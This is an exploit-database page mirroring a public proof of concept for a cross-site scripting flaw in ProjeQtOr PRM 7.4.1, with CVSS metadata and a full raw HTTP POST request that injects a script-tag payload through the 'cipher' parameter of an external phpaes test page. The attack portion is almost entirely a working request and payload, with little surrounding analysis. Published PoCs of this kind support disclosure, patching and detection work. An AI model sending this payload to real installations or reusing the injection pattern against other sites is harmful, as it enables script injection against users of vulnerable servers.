Advertisement






ProjeQtOr PRM 7.4.1 - 'cipher' XSS Vulnerability

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-15
CPE
cpe:cpe:/a:projeqtor:prm:7.4.1
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 0.039 0.9826

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040116

Below is a copy:

ProjeQtOr PRM 7.4.1 - 'cipher' XSS Vulnerability
===========================================================================================
# Exploit Title: ProjeQtOr PRM 7.4.1 - 'cipher' XSS Vulnerability
# Dork: N/A
# Date: 11-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://projeqtor.org/
# Software Link: https://sourceforge.net/projects/projectorria/
# Version: 7.4.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: 
# Software Description: Complete, Collaborative, Quality based Open Source Project Organizer.
===========================================================================================
# POC - XSS
# Parameters : cipher
# Attack Pattern : 1'"()&%<acx><ScRiPt >9zVr(9323)</ScRiPt>
# POST Request: http://localhost/projeqtor/external/phpaes/test.php
===========================================================================================
POST /projeqtor/external/phpaes/test.php HTTP/1.1
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/projeqtor/
Cookie: PHPSESSID=offdnj5n8jha9v4gqsmusi1isn
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

decr=Decrypt%20it&cipher=1'"()%26%25<acx><ScRiPt%20>9zVr(9323)</ScRiPt>&plain=1&pt=1&pw=L0ck%20it%20up%20saf3

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.